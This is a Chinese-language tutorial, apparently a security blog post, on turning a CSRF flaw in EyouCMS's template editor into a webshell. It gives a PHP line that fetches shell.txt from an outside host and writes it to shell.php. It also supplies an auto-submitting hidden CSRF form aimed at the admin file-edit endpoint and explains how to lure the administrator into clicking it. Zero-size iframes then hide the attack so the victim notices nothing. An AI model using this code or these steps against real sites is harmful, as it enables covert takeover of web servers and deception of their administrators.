【易优CMS】eyoucms某处CSRF漏洞之点我链接Getshell

第一步

来到模板管理,找到footer.html文档。

图片[1]-【易优CMS】eyoucms某处CSRF漏洞之点我链接Getshell-赤道学院

点击编辑

图片[2]-【易优CMS】eyoucms某处CSRF漏洞之点我链接Getshell-赤道学院

将其中得源码保存下来

<footer class="bg-main">
	<div class="container-layout">
		<ul>
			{eyou:channel type="top" row="4" id="field"}
			<li class="float-left item-{$i} hidden-l hidden-s">
				<h3 class="text-middle margin-big-bottom">{$field.typename}</h3>
				<ul>
					{eyou:channel name="$field.children" row="100" id="field2"}
					<li><a href="{$field2.typeurl}" title="{$field2.typename}">{$field2.typename}</a></li>
					{/eyou:channel}
				</ul>
			</li>
			 {/eyou:channel}
			
			<li class="float-left item-5">
				{eyou:type typeid='54'}
				<h3 class="text-middle margin-big-bottom">{$field.typename}</h3>
				{/eyou:type}
				<div class="contact">
					<div class="media media-x margin-big-bottom">
						<span class="float-left radius-circle bg-yellow text-white text-center">
							<i class="fa fa-map-marker fa-fw" aria-hidden="true"></i>
						</span>
						<div class="media-body">
							<p>{eyou:global name='web_attr_16' /}<p>
						</div>
					</div>				
					
					<div class="media media-x margin-big-bottom">
						<span class="float-left radius-circle bg-yellow text-white text-center">
							<i class="fa-fw fa fa-phone"></i>
						</span>
						<div class="media-body">
							<p>
								<a href="tel:{eyou:global name='web_attr_1' /}" class="Conv_DINCondensedC text-large">{eyou:global name='web_attr_1' /}</a>
							<p>
						</div>
					</div>
					<div class="media media-x margin-big-bottom">
						<span class="float-left radius-circle bg-yellow text-white text-center">
							<i class="fa fa-envelope fa-fw"></i>
						</span>
						<div class="media-body">
							<p>
								<a href="mailto:{eyou:global name='web_attr_15' /}" class="text-middle">{eyou:global name='web_attr_15' /}</a>
							</p>
						</div>
					</div>

				</div>
			</li>
			<li class="float-left item-6">
				<div class="qr padding radius text-center"><img src="{eyou:global name='web_attr_17' /}"><p class="text-gray height-middle">关注我们</p></div>
			</li>
		</ul>
	</div>
	<div class="blank-middle"></div>
	<!-- 友情链接 -->
	<div class="container-layout">
		<div class="line">	
			<div class="tab">
				<div class="tab-head">
					<ul class="tab-nav">
						<li class="active"><a href="#friend-1">友情链接</a></li>
						<!-- <li><a href="#friend-2">友情链接-图片</a> </li> -->
					</ul>
				</div>
				<div class="tab-body">
					<div class="tab-panel active flink" id="friend-1">
						{eyou:flink titlelen='45' type='text'}
							<a href="{$field.url}" {$field.target}>{$field.title} </a>
						{/eyou:flink}
					</div>
					<!-- <div class="tab-panel flink" id="friend-2">
						{eyou:flink titlelen='45' type='image'}
							<a href="{$field.url}" {$field.target}><img src="{$field.logo}"> </a>
						{/eyou:flink}
					</div> -->

				</div>
			</div>	
		</div>	
	</div>	
	<!-- 友情链接 end -->

	<div class="container-layout">
		<div class="line">
			<div class="copyright height">
				<div class="x8">
					{eyou:global name='web_copyright' /} {eyou:global name='web_recordnum' /}
				</div>
				<div class="x4 text-right">
					<a href="{eyou:global name='web_basehost' /}/sitemap.xml">SiteMap</a>
				</div>
			</div>
		</div>
	</div>
</footer>
<!--底部版权-->

<!-- 应用插件标签 start --> 
{eyou:weapp type='default' /} 
<!-- 应用插件标签 end -->

以上代码作为保存,待到Getshell后进入后台还原。

删除原有代码写入新代码

<?php

file_put_contents("shell.php",file_get_contents("http://1.1.1.1/shell.txt"));

?>

代码主要含义:首先利用 file_get_contents 函数请求获取 http://1.1.1.1/shell.txt 内容,然后在利用 file_put_contents 函数,将file_get_contents 函数获取得内容写入到根目录下面得shell.php。

然后保存抓取数据包。

图片[3]-【易优CMS】eyoucms某处CSRF漏洞之点我链接Getshell-赤道学院

然后制作POST类型得CSRF数据包

<html>
  <body>
    <form action="http://对方网址/login.php?m=admin&c=Filemanager&a=edit&lang=cn" method="POST">
      <input type="hidden" name="activepath" value="/template/pc" />
      <input type="hidden" name="filename" value="footer.htm" />
      <input type="hidden" name="content" value="<?php file_put_contents('shell.php',file_get_contents('http://1.1.1.1/shell.txt')); ?>" />
     
    </form>
     <script> document.forms[0].submit(); </script>
  </body>
</html>

上面代码得含义我解释一下

<input type="hidden" name="content" value="<?php file_put_contents('shell.php',file_get_contents('http://1.1.1.1/shell.txt')); ?>" />

这里需要将其中得双引号修改为单引号,其主要原因是input表单外部有双引号,最终如果他得value值也存在双引号会导致代码发生错误。另外其中有些下划线等符号被html实体化转义也需要更正过来。

其中加入了自动点击按钮,无需人工触发。

图片[4]-【易优CMS】eyoucms某处CSRF漏洞之点我链接Getshell-赤道学院

搭建一个hsf文件下载器,用于file_get函数获取文件,将 http://1.1.1.1/shell.txt 替换为你得shell下载地址。一定要确保hfs能被外网访问到。

发送制作好得html链接地址给管理员

图片[5]-【易优CMS】eyoucms某处CSRF漏洞之点我链接Getshell-赤道学院

当对方点击后会提示修改成功。

图片[6]-【易优CMS】eyoucms某处CSRF漏洞之点我链接Getshell-赤道学院

我们去刷新首页。

图片[7]-【易优CMS】eyoucms某处CSRF漏洞之点我链接Getshell-赤道学院

最后getshell成功!

图片[8]-【易优CMS】eyoucms某处CSRF漏洞之点我链接Getshell-赤道学院

在这个过程我们还需要去隐藏状态。并且因为每次用户点击之后我们需要去前台刷新,让插入得php代码得以运行。所以还需要自动刷新。

最终结果:

<h1>今日新闻</h1>
<iframe src="http://www.wbug.org:9003/eyoucms.html" width="0" height="0"></iframe>
<iframe src="http://1.117.163.116/index.php" width="0" height="0"></iframe>

当用户触发后不会看到被修改成功得页面,并且会自动生成webshell。最终达到神不知鬼不觉得目的。

© 版权声明
THE END
喜欢就支持一下吧
点赞15 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容